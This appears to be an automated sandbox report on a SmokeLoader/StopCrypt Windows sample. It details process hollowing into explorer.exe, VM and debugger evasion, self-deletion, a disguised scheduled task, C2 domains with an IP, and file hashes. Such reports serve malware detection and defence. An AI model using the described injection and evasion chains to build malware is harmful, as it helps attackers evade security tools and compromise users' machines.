Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0052198B push ebx; iretd	0_2_005219B7
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_004011D0 push ebx; iretd	10_2_00401217
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_004011D7 push ebx; iretd	10_2_00401217
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 10_2_004011EB push ebx; iretd	10_2_00401217
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0040548C pushad ; retf	12_2_004054AD
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_00407168 push eax; ret	12_2_00407186
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0040C16D push ecx; ret	12_2_0040C180

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00412B13 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00412B13

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sifdvgf

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sifdvgf

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\iknc1je7ry.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\sifdvgf:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 1096	Thread sleep count: 626 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3160	Thread sleep count: 306 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3160	Thread sleep time: -30600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2104	Thread sleep count: 314 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2104	Thread sleep time: -31400s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-9033
Source: C:\Users\user\AppData\Roaming\sifdvgf	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\explorer.exe

Window / User API: threadDelayed 626

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sifdvgf

API coverage: 7.5 %

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

System information queried: ModuleInformation

Jump to behavior

Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.389463965.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000B.00000000.339566619.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000B.00000000.370908749.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000B.00000000.356613170.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 0000000B.00000000.370908749.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00406C16

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

0_2_00412B13

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00416B07 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00416B07

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00520042 push dword ptr fs:[00000030h]

0_2_00520042

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0040CC65 SetUnhandledExceptionFilter,	0_2_0040CC65
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00406C16
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_0041069C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_0041069C
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: 0_2_004077DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004077DB
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0040CC65 SetUnhandledExceptionFilter,	12_2_0040CC65
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_00406C16 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00406C16
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_0041069C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	12_2_0041069C
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: 12_2_004077DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_004077DB

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: sifdvgf.11.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: host-file-host6.com
Source: C:\Windows\explorer.exe	Domain query: host-host-file8.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Memory written: C:\Users\user\Desktop\ikNC1JE7rY.exe base: 400000 value starts with: 4D5A

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00520110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

0_2_00520110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Thread created: C:\Windows\explorer.exe EIP: 57B1930

Jump to behavior

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Process created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"

Jump to behavior

Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000B.00000000.360403019.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.393557040.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.371352363.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.354757916.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.380521521.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.329989125.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 0000000B.00000000.330370836.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.381370334.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.355224915.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe	Code function: GetLocaleInfoA,		0_2_004170E0
Source: C:\Users\user\AppData\Roaming\sifdvgf	Code function: GetLocaleInfoA,		12_2_004170E0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_0040D835 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040D835

Source: C:\Users\user\Desktop\ikNC1JE7rY.exe

Code function: 0_2_00405A6B __EH_prolog,GlobalAlloc,VirtualProtect,GetLastError,GetProcessHandleCount,GetSystemDefaultLCID,GetVersionExW,GetComputerNameA,GlobalWire,ResetEvent,OpenWaitableTimerA,FindNextFileW,__wfopen_s,_feof,_puts,OleQueryCreateFromData,WinHttpCloseHandle,FoldStringW,_feof,_fsetpos,_fprintf,GetLongPathNameA,CreateMutexA,SetConsoleCtrlHandler,AddAtomW,lstrcpynA,SetFileShortNameW,GetFileType,FindFirstChangeNotificationW,GetConsoleAliasW,GetUserDefaultLangID,LoadLibraryA,

0_2_00405A6B

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 DLL Side-Loading	512 Process Injection	11 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	331 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	512 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	12 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ikNC1JE7rY.exe	72%	ReversingLabs	Win32.Ransomware.StopCrypt
ikNC1JE7rY.exe	39%	Virustotal		Browse
ikNC1JE7rY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sifdvgf	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\sifdvgf	72%	ReversingLabs	Win32.Ransomware.StopCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.ikNC1JE7rY.exe.5215a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.sifdvgf.4515a0.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.ikNC1JE7rY.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.0.ikNC1JE7rY.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://host-file-host6.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
host-file-host6.com	176.124.192.17	true	true		unknown
host-host-file8.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://host-file-host6.com/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000B.00000000.342540807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.372565994.000000000F270000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.124.192.17	host-file-host6.com	Russian Federation		59652	GULFSTREAMUA	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	713054
Start date and time:	2022-09-29 23:12:52 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ikNC1JE7rY.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/2@4/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 94% (good quality ratio 87%) Quality average: 75.8% Quality standard deviation: 30.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
23:15:11	Task Scheduler	Run new task: Firefox Default Browser Agent DDAFBAE16BF5DA6D path: C:\Users\user\AppData\Roaming\sifdvgf

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
176.124.192.17	o9dcXf4kd3.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	gRkuF8ZsVN.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/
	file.exe	Get hash	malicious	Browse	host-file-host6.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
host-file-host6.com	o9dcXf4kd3.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	gRkuF8ZsVN.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GULFSTREAMUA	XQf2T4w6HU.exe	Get hash	malicious	Browse	176.124.211.205
	o9dcXf4kd3.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	gRkuF8ZsVN.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17
	file.exe	Get hash	malicious	Browse	176.124.192.17

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\sifdvgf

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	297472
Entropy (8bit):	6.8318712843963985
Encrypted:	false
SSDEEP:	6144:ojycY4PGQvQbgTBVpv3kbByoSg0RwwVfg:oVGgRTXpf+BTStRk
MD5:	44F5530502DB25E5E66C15260EC4D25C
SHA1:	EDE93F48F848E0B70C6B883087923EA83F74E9D8
SHA-256:	4B952AC0A783E889A32E9528591E64EB51D41095B251C23C9763B3C8DB973690
SHA-512:	A50E57BB3A54F491F303D928C5B4224DFE6AB89D63589B0F1A77CDCDA808CAD35703483FE9420D2074BA4E0A780193A38B7AE23C8F9EE5DAD451805C35027DC3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 72%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K^_.0..0..0..x...0..x..)0...K..0..1.,0..x...0..x...0..x...0.Rich.0.........................PE..L...x.2a.................z...4......9w............@.................................9p.......................................~..P..................................0................................R..@............................................text....y.......z.................. ..`.data....r.......L...~..............@....rsrc..............................@..@.reloc..n............l..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\sifdvgf:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.8318712843963985
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ikNC1JE7rY.exe
File size:	297472
MD5:	44f5530502db25e5e66c15260ec4d25c
SHA1:	ede93f48f848e0b70c6b883087923ea83f74e9d8
SHA256:	4b952ac0a783e889a32e9528591e64eb51d41095b251c23c9763b3c8db973690
SHA512:	a50e57bb3a54f491f303d928c5b4224dfe6ab89d63589b0f1a77cdcda808cad35703483fe9420d2074ba4e0a780193a38b7ae23c8f9ee5dad451805c35027dc3
SSDEEP:	6144:ojycY4PGQvQbgTBVpv3kbByoSg0RwwVfg:oVGgRTXpf+BTStRk
TLSH:	D854CF3576A2C8BDD1A616304C25FFA06BBFBC31647085CB3764265E6E732809A7631F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K^_.0..0..0..x...0..x..)0...K..0..1.,0..x...0..x...0..x...0.Rich.0.........................PE..L...x.2a...........

File Icon


Icon Hash:	8c8cbcccce8888e7

Static PE Info

General

Entrypoint:	0x407739
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6132C078 [Sat Sep 4 00:40:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
